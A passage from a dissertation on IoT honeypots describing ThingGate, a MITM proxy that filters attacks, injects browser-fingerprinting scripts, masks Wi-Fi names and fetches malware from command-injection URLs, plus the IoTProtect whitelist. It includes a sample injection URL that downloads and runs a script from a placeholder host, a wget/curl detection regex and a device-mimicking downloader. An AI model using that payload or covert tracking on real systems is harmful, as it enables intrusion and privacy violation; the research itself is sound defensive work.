place the reset button on the control panel, and users have to hold the button for a while to
trigger the reset function.
3. Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents
devices from working again even after a factory reset. Moreover, some vulnerabilities, such
as CVE-2017-17020, may cause a service shutdown. These types of attack vectors require
human intervention for maintenance [38].
4. Purchasing every kind of physical IoT device to build a honeypot for analyzing attack vectors
is not affordable, so a honeypot can include only a limited number of devices. If the
weaknesses of the devices do not match the incoming attack vector, the attack fails and the
IoT devices cannot capture the subsequent traffic or binaries from clients.
5. In SIPHON [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often
offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect worldwide
cyber attacks against IoT via a few devices deployed locally. However, their research did not
discuss whether Wi-Fi Access Point (AP) names may expose the location. The Wi-Fi AP list
may dynamically show any scanned AP, including a Personal Hotspot on a passerby's mobile
device. The AP names shown in the WebUI may contain personal or organizational information
that exposes the physical location of the honeypot.
To address these challenges of physical IoT devices, we propose ThingGate, a customized
MITM proxy for managing the flow between clients and a honeypot that consists of real IoT devices.
ThingGate provides the following functionalities:
1. Incoming traffic management
ThingGate blocks the incoming flow of unwanted or destructive attack vectors.
2. Extending functions of web tracking
Our proxy injects fingerprinting JavaScript code through the MITM position to track user clients.
3. Response information management
Our program checks the HTTP responses from IoT devices and prevents the leakage or exposure
of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly,
so we prevent leakage through a light-weight and straightforward method instead.
4. Real-time analysis of misplaced cyber attacks
IoT malware exploits various vulnerabilities in the WebUI of devices and injects OS commands
into the URL. However, some malware does not check the targeted device before sending malicious
HTTP requests. For a misplaced command injection URL (CI-URL) whose attack target is
not among our physical IoT devices, we can conduct real-time analysis and download tasks.
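The incoming traffic management and the handling of misplaced CI-URLs can be pictured as a
small triage step inside the proxy. The following Python sketch is illustrative only and is not
the ThingGate implementation: the rule lists BLOCKED_PATTERNS and DEVICE_PATHS, the URL names
in them (other than get_status.cgi), the command-injection heuristic CI_HINT, and the function
name triage_request are all assumptions introduced here.

```python
import re
from urllib.parse import unquote

# Hypothetical rule sets (assumptions, not taken from ThingGate).
# BLOCKED_PATTERNS: requests that must never reach the physical device.
BLOCKED_PATTERNS = [re.compile(r"set_network\.cgi"), re.compile(r"factory_reset")]
# DEVICE_PATHS: paths that the devices in the honeypot actually serve.
DEVICE_PATHS = ("/get_status.cgi", "/snapshot.cgi", "/index.html")

# Rough heuristic: a shell separator followed by a download or shell tool.
CI_HINT = re.compile(r"(;|\||`|\$\()\s*(wget|curl|tftp|busybox|sh)\b")


def triage_request(url):
    """Return 'block', 'analyze', or 'forward' for one request URL."""
    decoded = unquote(url)
    if any(p.search(decoded) for p in BLOCKED_PATTERNS):
        return "block"      # unwanted or destructive request
    path = decoded.split("?", 1)[0]
    if CI_HINT.search(decoded) and path not in DEVICE_PATHS:
        return "analyze"    # misplaced CI-URL: hand over to the analysis module
    return "forward"        # let the physical device answer
```

In this sketch, a request is forwarded unless a rule matches, so the physical device keeps
answering everything that the operator has not explicitly classified.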
3.2. Analysis of cyber attacks in IoT
IoT honeypots have successfully observed Botnets targeting IoT devices over the Telnet and HTTP
protocols. The observation produced massive amounts of malware binaries and attack vector logs.
Besides, IoT malware continues to evolve, and the diversity of OSs and environments increases
the difficulty of executing malware samples in dynamic analysis. To address these problems, we
develop an alternative means of investigation that uses the attack vectors and analyzes
malware without executing it. Moreover, we summarize the attack vectors to create an in-depth
view of cyber attacks in IoT.
The primary attack vector of cyber attacks in IoT is the Telnet protocol (75%)
[8]. Thus, we focus on analyzing the Telnet logs and malware binaries. The dataset comes from the
honeypot consisting of physical IoT devices. To compress the data, we develop an encoding
method that maps Telnet logs to simplified character sequences.
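As a rough illustration of such an encoding, the following Python sketch maps each command in a
Telnet session to a single character. The table COMMAND_SYMBOLS, the fallback symbol UNKNOWN, and
the function name encode_session are hypothetical; the actual encoding table of this study is not
reproduced here.

```python
# Hypothetical command-to-symbol table (an assumption for illustration).
COMMAND_SYMBOLS = {
    "enable": "e", "shell": "s", "sh": "s", "cd": "c", "wget": "w",
    "tftp": "t", "chmod": "m", "rm": "r", "cat": "a", "echo": "o",
}
UNKNOWN = "x"  # any command that is not in the table


def encode_session(log_lines):
    """Map each command of a Telnet session to one character."""
    symbols = []
    for line in log_lines:
        # One line may chain several commands with ';' or '&&'.
        for part in line.replace("&&", ";").split(";"):
            tokens = part.split()
            if not tokens:
                continue
            name = tokens[0].rsplit("/", 1)[-1]   # /bin/busybox -> busybox
            if name == "busybox" and len(tokens) > 1:
                name = tokens[1]                   # busybox wget -> wget
            symbols.append(COMMAND_SYMBOLS.get(name, UNKNOWN))
    return "".join(symbols)
```

For example, the session "enable", "shell", "cd /tmp; /bin/busybox wget http://h/a",
"chmod 777 a && ./a" is encoded as the six-character sequence "escwmx" under this table.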
Further, we study and evaluate which distance algorithm best distinguishes these sequences
according to their malware families, and we extract key patterns of different interaction
behaviors using an N-gram model. We employ both unsupervised and supervised learning
algorithms, together with text-mining algorithms for handling unstructured data. For unsupervised
learning, because cyber attacks in IoT keep evolving and the patterns of attacks are uncertain,
we choose the hierarchical clustering method, which does not require predefining
the number of clusters.
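The combination of N-grams, a distance measure, and hierarchical clustering can be sketched as
follows. This is a minimal illustration under stated assumptions, not the procedure evaluated in
this study: the Jaccard distance over character bigrams, single linkage, and the threshold of 0.5
are choices made here only for the example.

```python
def ngrams(seq, n=2):
    """Set of character n-grams of an encoded command sequence."""
    return {seq[i:i + n] for i in range(len(seq) - n + 1)}


def jaccard_distance(a, b, n=2):
    """1 - |A & B| / |A | B| over the n-gram sets of two sequences."""
    ga, gb = ngrams(a, n), ngrams(b, n)
    if not ga and not gb:
        return 0.0
    return 1.0 - len(ga & gb) / len(ga | gb)


def cluster(seqs, threshold=0.5, n=2):
    """Single-linkage agglomerative clustering cut at `threshold`.

    The number of clusters is not fixed in advance: merging stops when
    the closest pair of clusters is farther apart than `threshold`.
    """
    clusters = [[i] for i in range(len(seqs))]

    def linkage(c1, c2):
        return min(jaccard_distance(seqs[i], seqs[j], n) for i in c1 for j in c2)

    while len(clusters) > 1:
        pairs = [(linkage(clusters[i], clusters[j]), i, j)
                 for i in range(len(clusters))
                 for j in range(i + 1, len(clusters))]
        dist, i, j = min(pairs)
        if dist > threshold:
            break
        clusters[i] += clusters.pop(j)   # j > i, so index i stays valid
    return [sorted(c) for c in clusters]
```

The quadratic pair search keeps the sketch short; a large log collection would need an
optimized clustering library instead.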
For supervised learning algorithms, we propose a malware classification method based on
malware binaries, command sequences, and meta-features. Our approach trains a multiclass
classifier to identify IoT malware categories based on common infection behavior. For
misclassified subclasses, second-stage sub-training is performed using a file meta-feature. Finally,
we use a confusion matrix and accuracy to measure the classification result.
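For reference, the two measures can be computed as in the following Python sketch. The function
names are introduced here for illustration, and the label values used with them are
placeholders rather than results of this study.

```python
from collections import Counter


def confusion_matrix(true_labels, predicted_labels):
    """Count how often each (true, predicted) label pair occurs."""
    return Counter(zip(true_labels, predicted_labels))


def accuracy(matrix):
    """Fraction of samples on the diagonal of the confusion matrix."""
    total = sum(matrix.values())
    correct = sum(count for (true, pred), count in matrix.items() if true == pred)
    return correct / total if total else 0.0
```

Off-diagonal cells with large counts indicate the subclasses that are candidates for the
second-stage sub-training.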
3.3. Countermeasure of cyber attacks in IoT
In the attack campaigns of IoT Botnets, the attacker usually uploads malware binaries to
a writable folder on the victim device. Besides, the filesystem and storage of low-cost IoT devices
are limited, and most files are read-only or generated on the fly by the Linux kernel. Therefore, the
whitelists contain only a few thousand entries. Based on these features, we propose IoTProtect, a
whitelisting method for protecting low-cost IoT devices. IoTProtect consists of three whitelists
and a checker program. The pathname whitelist lists the pathnames of all legitimate executables.
The hash value whitelist records the MD5 hash values of binaries on IoT devices. The cmdline
whitelist and its comparison are optional and are used only if there are processes whose
pathname and exe links cannot be read from the "proc" filesystem.
For the creation of whitelists, we assume that the device to be protected has already been
developed and that the device developer is to install IoTProtect on top of the existing system. We
skip the files coming from on-the-fly filesystems, such as sysfs, proc, usbfs, and I/O files. If
developers know precisely which executable files to include on the whitelist, they can create their
whitelist manually. However, recent IoT device products are often not developed by a single
manufacturer, and each developer does not know all of the legitimate executables exactly. In such
a case, developers can still create whitelists that include all executables existing in the system by
using the Linux command "find" with the "-exec" expression and "md5sum." Moreover, the
cmdline whitelist can be created by "find" with the "-exec" expression and "cat" Linux commands.
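The whitelist creation step can be sketched in Python as follows. This is an illustrative
equivalent of walking the filesystem and hashing every executable, not the shell commands used by
IoTProtect; the function names, the SKIP_DIRS set, and the use of the execute permission bit to
select executables are assumptions.

```python
import hashlib
import os

# Assumed mount points of on-the-fly and I/O filesystems to skip.
SKIP_DIRS = {"/proc", "/sys", "/dev"}


def md5_of(path, chunk=65536):
    """MD5 hex digest of a file, read in chunks to limit memory use."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def build_whitelists(root="/", skip_dirs=SKIP_DIRS):
    """Return (pathname whitelist, MD5 whitelist) for executables under root."""
    paths, hashes = set(), set()
    for directory, subdirs, files in os.walk(root):
        # Prune skipped directories so os.walk does not descend into them.
        subdirs[:] = [d for d in subdirs
                      if os.path.join(directory, d) not in skip_dirs]
        for name in files:
            path = os.path.join(directory, name)
            if os.path.isfile(path) and os.access(path, os.X_OK):
                try:
                    hashes.add(md5_of(path))
                except OSError:
                    continue   # unreadable file: leave it out of both lists
                paths.add(path)
    return paths, hashes
```

Running the walk once on a clean device and storing both sets gives the reference lists that
the checker later compares against.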
IoTProtect first filters processes that are not included in the pathname whitelist and then filters
the remaining processes according to the hash value whitelist. It then filters the remainder with
the cmdline whitelists if there are any processes with no pathname and exe links. Finally, it
removes all remaining processes.
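The filtering order can be sketched as a pure function over process records. The sketch reflects
one reading of the description above and is not the IoTProtect Bash checker: the Process record,
its field names, and the function processes_to_remove are hypothetical, and the sketch only
returns the PIDs to remove instead of terminating anything.

```python
from typing import NamedTuple, Optional


class Process(NamedTuple):
    pid: int
    exe_path: Optional[str]   # target of /proc/<pid>/exe, None if unreadable
    md5: Optional[str]        # MD5 of that executable, None if unreadable
    cmdline: str              # content of /proc/<pid>/cmdline


def processes_to_remove(processes, path_wl, hash_wl, cmdline_wl):
    """Return the PIDs of processes that fail the whitelist checks."""
    doomed = []
    for proc in processes:
        if proc.exe_path is None:
            # No pathname or exe link: fall back to the cmdline whitelist.
            allowed = proc.cmdline in cmdline_wl
        else:
            # Pathname check first, then the hash check on what remains.
            allowed = proc.exe_path in path_wl and proc.md5 in hash_wl
        if not allowed:
            doomed.append(proc.pid)
    return doomed
```

Checking the hash in addition to the pathname means that a malicious binary that overwrites a
legitimate path still fails the check.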
In this dissertation, we conducted experiments with four actual IoT devices and 4,981 malware
binaries captured by our IoT honeypot. We present four different experiments that
evaluate the effectiveness, overhead, and ease of deployment of IoTProtect.
Chapter 4.
ThingGate: A gateway for flexible operation of bare-metal IoT
honeypot
4.1. Introduction
In recent years, people have been connecting various things to the Internet for monitoring,
collecting data, or remote manipulation. Backend applications collect and exchange data with
these devices through the network. A network of this kind is called the Internet of things
(IoT). However, the IoT malware “Mirai” was used to conduct a massive Distributed Denial
of Service (DDoS) attack against Dyn DNS in October 2016. About 100,000 Mirai
IoT Botnet nodes were enlisted in this incident, and reported attack rates were up to 1.2 Tbps [2].
Cyber threats from IoT Botnets have therefore become a reality. To observe cyber attacks against
such devices and analyze the threats from IoT malware, researchers have designed new observation
mechanisms and built various honeypots. These honeypots include, for example, IoTPOT [4],
SIPHON [5], IoTCandyJar [6], and a real-device honeypot for observing the WebUI of IoT devices
[7].
The competition between hackers and cybersecurity researchers is an endless war. IoT malware
keeps evolving and exploits multiple vulnerabilities to infect IoT devices. Since May 2018,
variants of the Mirai and Bashlite malware families have assimilated multiple known exploits
affecting Internet of Things (IoT) devices. These exploits target devices from 11 makers over the
HTTP, UPnP, Telnet, and SOAP protocols [3]. Besides well-known activities such as DDoS, recent
IoT malware has diverse purposes, including coin mining, click fraud, and sending spam emails.
In addition, human attackers utilize various tools to access devices and collect various
information from them. For example, the WebUIs of many IP Cameras and routers are constantly
searched for and accessed if vulnerable. To observe and analyze such a variety of attacks in depth,
there is an increasing need for a bare-metal IoT honeypot, namely a real IoT device used as a
honeypot, because it is costly to emulate device-specific vulnerabilities and the complicated
functionalities provided through the WebUI and other dedicated services, such as UPnP.
However, it is worth noting that operating bare-metal IoT honeypots has unique technical
challenges mostly coming from their low configurability as an embedded system. For example,
honeypot operators may need to control the incoming traffic since there are critical attacks that
may destroy firmware and/or change the network configuration of devices that could disconnect
the honeypot devices. Also, honeypot operators may need to mask and/or replace outgoing
responses from the honeypot devices as they may contain information such as surrounding
wireless access points, which could reveal the physical location of the honeypot devices.
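Masking an outgoing response can be as simple as rewriting the access point names before the
response leaves the proxy. The Python sketch below assumes, purely for illustration, that the
WebUI lists each scanned access point as <ssid>NAME</ssid>; real devices use their own formats,
and the function name mask_ssids and the decoy names are hypothetical.

```python
import itertools
import re

# Assumed markup of one scanned access point in the WebUI response.
SSID_TAG = re.compile(r"<ssid>.*?</ssid>", re.DOTALL)


def mask_ssids(body, decoys):
    """Replace every scanned SSID in a response body with a decoy name.

    `decoys` must be a non-empty sequence; names are reused cyclically
    when the response lists more access points than there are decoys.
    """
    names = itertools.cycle(decoys)
    return SSID_TAG.sub(lambda _m: "<ssid>" + next(names) + "</ssid>", body)
```

Because the substitution replaces every entry, a hotspot that appears only briefly near the
honeypot is masked in the same way as a permanent access point.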
4.2. Definitions
4.2.1. Man-in-the-middle
The man-in-the-middle (MITM) refers to an attack in which the attacker positions themselves
between two communicating parties and secretly relays or alters the communication between
these parties, who believe that they are engaging in direct communication with each other.
Messages intended for the legitimate site are passed to the attacker instead, who saves valuable
information, passes the messages to the legitimate site, and forwards the responses back to the
user. An MITM position enables the web proxy attack, in which a malicious web proxy receives
all web traffic from a compromised computer and relays it to a legitimate site. The proxy collects
credentials and other confidential information from the traffic. MITM flows are difficult to detect
because a legitimate site can appear to be functioning properly and the user may not be aware that
something is wrong [39]. We use the web proxy technique to monitor and manage the flow between
clients and our honeypot.
4.2.2. Transparent Proxy
In computer networks, a proxy server is a server that acts as an intermediary for requests from
clients seeking resources from other servers [40]. A proxy server can fulfill the request from the
client, filter it out, or modify it in a specific way. Transparent proxying means that
traffic is redirected into a proxy at the network layer, without any client configuration
[9]. The client is unaware that the response it receives originates from the proxy server and not
from the source server. We forward flows through the MITM proxy using pf on FreeBSD [41]
and socat [42].
4.2.3. Browser fingerprinting
Browser fingerprinting collects browser attributes that make a user, or a small subset of users,
uniquely recognizable. The fingerprint is primarily used as a global identifier for those users,
and this identifier can be used to build a web tracking mechanism for user browsers [43]. In 2012,
Mowery and
Shacham presented canvas fingerprinting, which is a web fingerprinting algorithm [44]. They
demonstrated that the new HTML5 feature could be used to generate a relatively unique
fingerprint that could be used to track users. Canvas fingerprinting uses the browser’s Canvas API
to draw invisible images and extract a persistent, long-term fingerprint without the user’s
knowledge [45]. Tracking mechanisms have advanced such that these mechanisms are difficult to
control and detect and are resilient to blocking or removing. Another feature of canvas
fingerprinting is that the resulting fingerprint may differ from one browser to another on the same
machine [46]. In this study, we use fingerprintjs2 [47], which is an open-source library of canvas
fingerprinting, to achieve the web tracking function.
4.2.4. Cyber attacks against WebUI of Physical IoT Devices
In 2017, Ezawa et al. [7] proposed a honeypot consisting of physical IoT devices to observe
attacks against the WebUI of IoT devices. The devices include IP Cameras, routers, pocket routers,
a printer, and a TV receiver. In 2018, Tamiya et al. [17] employed five IP Cameras to build a
decoy honeypot to capture the behavior of peeping attackers. Based on these two honeypots,
we summarize four kinds of cyber attacks against these WebUIs:
1. Configuration information theft attacks
If the device has information disclosure vulnerabilities or weak credentials, the
attacker can collect the configuration and parameters of the device through certain URLs,
such as get_status.cgi.
2. Modification of the configuration
According to the observations of the two honeypots, attackers may modify the DDNS, VPN,
credentials, and network configuration.
3. Snapshot attacks
Snapshot is a feature of IP Cameras that offers users a current image of the live stream.
Once a client sends the HTTP request for a snapshot, the web server provides the
current image as a JPG or PNG file.
4. Long-term peeping
IP Cameras record this attack when a client accesses the URL of the live stream and stays
on the live-stream web page for several hours.
4.3. ThingGate
4.3.1. System goal
The use of conventional IoT devices for building new honeypots raises the following
challenges:
1. Poor expandability
The resources of IoT devices are limited, and installing additional libraries may require
modifying the firmware.
2. Inconvenient reset or restore mechanism
The reset or recovery process requires manual operation on the devices. Many devices place the
reset button on the control panel, and users have to hold the button down for a while to trigger
the reset function.
3. Threat of service-crashing (segmentation fault) attacks or bricking commands
Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents devices
from working again even after a factory reset. Moreover, some vulnerabilities, such as
CVE-2017-17020, may cause a service shutdown. These types of attack vectors require human
resources for maintenance [38].
4. Misplaced cyber attacks in IoT flow
Purchasing every kind of physical IoT device to build a honeypot for analyzing attack vectors is
not affordable, so only a limited number of devices can be used in a honeypot. If the devices'
weaknesses do not fit the incoming attack vector, the attack fails and the devices cannot
capture the subsequent flow or binaries from clients.
5. Exposure risk from the sensor information
In SIPHON [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often
offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect worldwide
cyber attacks against IoT via a few devices deployed locally. However, their research did not
mention whether the Wi-Fi access point (AP) names may expose the location. The Wi-Fi AP list
may dynamically show any scanned AP, including a personal hotspot from a passerby's mobile
device. The AP names shown in the WebUI may include personal or organizational information,
which can expose the physical location of the honeypot.
ThingGate is a customized MITM proxy for managing the flow between clients and a honeypot
that consists of physical IoT devices. To address the challenges of a honeypot built from physical
IoT devices, we define the following goals.
1. Incoming traffic management
We wish to block the incoming flow of unwanted or deadly attack vectors.
2. Extending functions of web tracking
Our proxy injects fingerprinting JavaScript code from its MITM position to track clients.
3. Response information management
Our program checks the HTTP responses from IoT devices and prevents the leakage or exposure
of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly,
so we aim to prevent leakage through a simple and lightweight method.
4. Real-time analysis of misplaced cyber attacks
IoT malware exploits various vulnerabilities in the WebUI of devices and injects OS commands
into the URL. However, some malware does not check the targeted device before sending malicious
HTTP requests. For a misplaced command injection URL (CI-URL), whose attack target is not
among our physical IoT devices, we can conduct real-time analysis and download tasks.
4.3.2. System Overview
Our design, which was inspired by SIPHON architecture [5], is displayed in Fig. 3. Our
honeypot consists solely of physical IoT devices. Moreover, SIPHON’s forwarder is improved
with an MITM proxy to manage the forward traffic from wormholes to local physical IoT devices.
We design a module to analyze some CI-URLs. These flows may target IoT devices other than
ours.
Fig. 3 System overview of ThingGate
Wormhole. The wormhole device contains some ports open to the general Internet on a public IP
address. We transparently forward the incoming traffic toward these ports through an MITM
proxy to a specific port on a remote physical IoT device. Forwarding is conducted through socat
[42], which is a command-line-based utility that establishes two bidirectional byte streams.
CI-URL Analysis and Downloader (CAD). If the flow contains features of CI-URLs, then we
redirect the HTTP request to CAD. CAD provides 200 response codes to the client and analyzes
the CI-URL. If CAD successfully extracts download links from the flow, real-time download
tasks of links can be conducted.
MITM Proxy. The MITM proxy sits on the socat forwarding path between the wormhole and the IoT
device so that the protection and HTTP response rewriting tasks are accomplished in real time. The
proxy examines every flow and decides whether to block it, delegate it to a device, or redirect it
to the CI-URL analysis and downloader (CAD). The proxy modifies the flow in an MITM manner.
IoT Devices. IoT devices are typical commercial off-the-shelf devices that contain vulnerabilities.
In this system, we focus on cyber attacks against the WebUI of IoT devices. Thus, we only forward
incoming HTTP flow to its HTTP service ports.
Data Storage. The storage dumps traffic records from the wormholes and aggregates the data for
offline analysis. For example, Wireshark is used to analyze the headers of HTTP requests in
dumped traffic files.
4.3.3. System Architecture and Modules
The system architecture of ThingGate is displayed in Fig. 4. The MITM proxy transparently
manages the input and output flow of the honeypot constructed with physical IoT devices in real
time. IoT devices answer the flow delegated by the proxy and send the HTTP response back to the
client through the MITM proxy. The proxy redirects HTTP requests that contain CI-URLs to the
CAD, which extracts links and downloads malware binaries. In addition, the proxy injects
fingerprinting JavaScript code into the HTTP response content and replaces sensitive information
with fabricated material.
Fig. 4 System Architecture of ThingGate
The details of the modules are as follows:
Request Controller. The request controller is in charge of incoming HTTP requests. It reviews
every request and determines whether the flow should be directly forwarded to IoT devices. The
process of URL checking is illustrated in Fig. 5. First, we examine whether the URL exploits a
dangerous vulnerability of our IoT devices. For example, D-Link’s IP Camera DCS-5020L contains a
vulnerability in its WebUI: if attackers post a long string value in the form parameters to the URL
“/setSystemNetwork”, the HTTP request causes the web service to crash [48]. Therefore, the
request controller replaces such a URL with another valid URL. Second, according to the study by
Ezawa et al., some attackers change the DDNS, VPN, or network settings of IoT devices [7] to
prevent other clients from accessing the device. These attacks may require manual tasks such as
rebooting or resetting devices. Therefore, we must protect these critical configurations. The
request controller checks the URL of each incoming request, filters out the requests that cause
unwanted configuration changes, and replaces their URLs with other valid URLs of the WebUI.
Third, our program checks whether operating system (OS) commands and URLs of other sites are
embedded in the URL. The request controller redirects these CI-URLs to the CAD. Finally, the
request controller forwards the remaining HTTP requests to IoT devices.
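The URL-checking steps of the request controller can be sketched as a small decision function. This is only an illustration under stated assumptions, not the prototype's code: the names `DANGEROUS_PATHS`, `CONFIG_REPLACEMENTS`, `looks_like_ci_url`, and `route_request` are hypothetical, the replacement page chosen for "/setSystemNetwork" is a placeholder, and the CI-URL test is a simple heuristic assumed for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Hypothetical lists; real lists would be built per device.
DANGEROUS_PATHS = {"/setSystemNetwork": "/index.htm"}  # crash-inducing URL -> placeholder page
CONFIG_REPLACEMENTS = {
    "/set_network.cgi": "/admin2.htm",  # configuration URL -> read-only page
    "/reboot.cgi": "/admin2.htm",
}

# Assumed heuristic: a download command or an embedded URL in the decoded query string.
CI_PATTERN = re.compile(r"(wget|curl|tftp)\s|https?://", re.IGNORECASE)


def looks_like_ci_url(url: str) -> bool:
    """Return True if the decoded query seems to carry OS commands or another site's URL."""
    query = unquote(urlsplit(url).query)
    return bool(CI_PATTERN.search(query))


def route_request(url: str) -> tuple[str, str]:
    """Return (action, url) where action is 'replace', 'redirect_to_cad', or 'forward'."""
    path = urlsplit(url).path
    if path in DANGEROUS_PATHS:        # step 1: dangerous vulnerability
        return "replace", DANGEROUS_PATHS[path]
    if path in CONFIG_REPLACEMENTS:    # step 2: critical configuration
        return "replace", CONFIG_REPLACEMENTS[path]
    if looks_like_ci_url(url):         # step 3: command injection URL
        return "redirect_to_cad", url
    return "forward", url              # step 4: everything else goes to the device
```

In a proxy, a function of this kind would be called once per incoming request, and the returned action would decide whether the request is rewritten, handed to the CAD, or passed to the device unchanged.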
Fig. 5 The processing flow of Request controller
Response controller. The response controller is in charge of the HTTP responses from IoT
devices. The following conditions trigger action by the response controller.
1. The HTTP response from IoT devices contains a body tag.
The response controller injects fingerprinting JavaScript code into the body tag. The
JavaScript library creates a hash fingerprint if the client supports JavaScript.
2. The HTTP response includes sensitive information.
In this method, we focus on the Wi-Fi AP list. The name of a Wi-Fi AP may contain a
username or information concerning the organization or location. The response controller
replaces all APs with fabricated AP information.
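The two response-side actions can be sketched as plain string transformations. This is a minimal sketch under assumptions: the script URL "/fp.js", the function names, and the idea that the real AP names have already been extracted from the device-specific page are all hypothetical and not taken from the prototype.

```python
import re

# Hypothetical snippet; a real deployment would point at the fingerprinting script it serves.
FINGERPRINT_SNIPPET = '<script src="/fp.js"></script>'


def inject_fingerprint(html: str, snippet: str = FINGERPRINT_SNIPPET) -> str:
    """Insert the snippet right before the closing body tag, if the page has one."""
    match = re.search(r"</body\s*>", html, flags=re.IGNORECASE)
    if match is None:
        return html  # no body tag: leave the response untouched
    return html[:match.start()] + snippet + html[match.start():]


def fabricate_ap_names(html: str, real_names: list[str], fake_names: list[str]) -> str:
    """Replace each observed AP name with a fabricated one (fakes are reused cyclically)."""
    if not fake_names:
        raise ValueError("at least one fabricated AP name is required")
    for index, name in enumerate(real_names):
        html = html.replace(name, fake_names[index % len(fake_names)])
    return html
```

Keeping both steps as pure functions makes them easy to check offline before they are wired into a proxy's response hook.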
CI-URL Analyzer. The CI-URL analyzer is responsible for two analyses: extracting download links
from the CI-URLs and from the downloaded scripts. It includes two components, namely the URL
parser and the script parser. The URL parser decodes the CI-URLs and transforms them into OS
commands (Fig. 6). The CI-URL in Fig. 6 exploits the vulnerability of the D-Link router
DSL-2750B [49]. The URL parser decodes the CI-URL and extracts the link
"http://yyy.yyy.173.159/d" from the OS commands. The CI-URL analyzer then passes the link to the
downloader.
Fig. 6 The encoded URL of CI-URL and decoded results
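The decoding and link extraction performed by the URL parser can be illustrated with the Python standard library. The sketch below is an assumption about how such a parser could work, not the prototype's implementation: `LINK_PATTERN`, `decode_ci_url`, and `extract_links` are hypothetical names, and the address 192.0.2.10 in the usage note is a documentation placeholder rather than an observed host.

```python
import re
from urllib.parse import unquote

# A link ends at whitespace, a quote, or a shell separator.
LINK_PATTERN = re.compile(r"(?:https?|ftp|tftp)://[^\s'\";|&`]+", re.IGNORECASE)


def decode_ci_url(ci_url: str) -> str:
    """Percent-decode the CI-URL so that the embedded OS commands become readable."""
    return unquote(ci_url)


def extract_links(ci_url: str) -> list[str]:
    """Return the download links found in the decoded CI-URL, in order, without duplicates."""
    links: list[str] = []
    for link in LINK_PATTERN.findall(decode_ci_url(ci_url)):
        if link not in links:
            links.append(link)
    return links
```

For a request such as `/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.10/d%20-O%20/tmp/d;sh%20/tmp/d%27$`, decoding exposes the `wget` command, and the pattern picks out the link that would be handed to the downloader.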
If we successfully download the file and the file is a shell script file (e.g., the script displayed
in Fig. 7), then the script parser analyzes the content, traverses all parameters, and extracts the
links of malware. Finally, the script parser passes the links of malware to the downloader.
Fig. 7 Downloaded Scripts from CI-URL
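The script parser's traversal of a downloaded shell script can be sketched in the same spirit. This is a simplified illustration that assumes the links appear as literal URL arguments; the function name is hypothetical, the sample addresses are documentation placeholders, and scripts that assemble URLs from variables would need the sandbox approach instead.

```python
import re
import shlex

URL_TOKEN = re.compile(r"^(?:https?|ftp)://\S+$", re.IGNORECASE)


def extract_script_links(script_text: str) -> list[str]:
    """Walk every command of a shell script and collect arguments that look like URLs."""
    links: list[str] = []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines, comments, and the shebang
        for command in re.split(r";|&&|\|\|", line):
            try:
                tokens = shlex.split(command)
            except ValueError:
                tokens = command.split()  # unbalanced quotes: fall back to a plain split
            for token in tokens:
                if URL_TOKEN.match(token) and token not in links:
                    links.append(token)
    return links
```

Each returned link would then be passed to the downloader, one task per link.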
Downloader. The downloader is responsible for downloading malware binaries. We found that the
header values in HTTP requests issued by IoT devices can be distinguished from those issued by
Unix/Linux server operating systems. For example, the user-agent value sent by the wget command
on macOS Mojave 10.14.2 is "Wget/1.13.4 (darwin13.1.0)", where "darwin13.1.0" is a library name
of macOS packages [50]. In contrast, the user-agent value sent by router A in Table 1 is
"Wget/1.16 (linux-gnu)". The user-agent in the HTTP header may therefore expose information about
the download client, so we customized our header values to appear as similar as possible to those
of IoT devices.
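A download request with device-like header values can be prepared as follows. This is a sketch using Python's `urllib.request`, not the prototype's downloader: the header set is an assumption modelled on the router user-agent quoted above, and `urllib` still adds a few headers of its own, so closer mimicry would require a lower-level HTTP client.

```python
import urllib.request

# Assumed header values, modelled on the router user-agent quoted in the text.
IOT_LIKE_HEADERS = {"User-Agent": "Wget/1.16 (linux-gnu)", "Accept": "*/*"}


def build_download_request(link: str, headers: dict[str, str] = IOT_LIKE_HEADERS) -> urllib.request.Request:
    """Prepare (but do not send) a GET request whose headers resemble an IoT device's wget."""
    return urllib.request.Request(link, headers=dict(headers), method="GET")


def download(link: str, timeout: float = 10.0, max_bytes: int = 10_000_000) -> bytes:
    """Fetch at most max_bytes from the link; intended only for an isolated analysis network."""
    with urllib.request.urlopen(build_download_request(link), timeout=timeout) as response:
        return response.read(max_bytes)
```

Separating request construction from the network call allows the header values to be inspected without contacting a malware distribution server.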
4.4. Evaluation
4.4.1. Prototype and dataset
We developed a prototype of ThingGate using Python and the open-source MITM proxy
software [51]. We performed four different experiments with seven physical IoT devices to
evaluate the effectiveness of ThingGate. Table 1 presents the specifications of our devices, all of
which contained vulnerabilities that had been publicly disclosed. We installed ThingGate
on a server with a four-core 3.10 GHz Intel CPU, 16 GB of RAM, and a 1.8 TB disk.
Table 1 IoT devices used in experiments.
IoT device | Maker's country | CPU arch. | Approx. price* (JPY)
Router A | Taiwan | MIPS | 26,000
IP Camera A1 | China | ARM | 4,980
IP Camera A2 | China | ARM | 4,980
IP Camera A3 | China | ARM | 4,980
IP Camera B | USA | ARM | 3,000
IP Camera C | Taiwan | MIPS | 14,000
IP Camera D | Taiwan | MIPS | 7,960
* We collected this price information from Amazon Japan on Oct. 1, 2018. IP Cameras A1~A3 are the
same model.
Table 2 presents the two datasets collected by our honeypot through ThingGate. From September
8 to October 13, 2018, we used five devices and 19 IP addresses to collect the attack flow (dataset
1). From this dataset, we compiled the list of critical configuration URLs and the URLs that
exploit deadly vulnerabilities of our IoT devices, and we designed and implemented the prototype
of ThingGate accordingly. From November 17, 2018, to June 30, 2019, we deployed ThingGate and
forwarded 19 IP addresses to conduct the evaluation experiments. The collected flow for this
period is labeled as dataset 2.
Table 2 Datasets for analysis.
Dataset | Number of HTTP requests | Number of honeypot IPs | Time interval | Analysis subjects
1 | 307,405 | 19 | 2018/09/08~2018/10/13 | Blocking list, CI-URL, and CAD
2 | 1,920,653 | 19 | 2018/11/17~2019/06/30 | Blocking unwanted flow, web tracking, handling misplaced attacks, fabricated sensor content
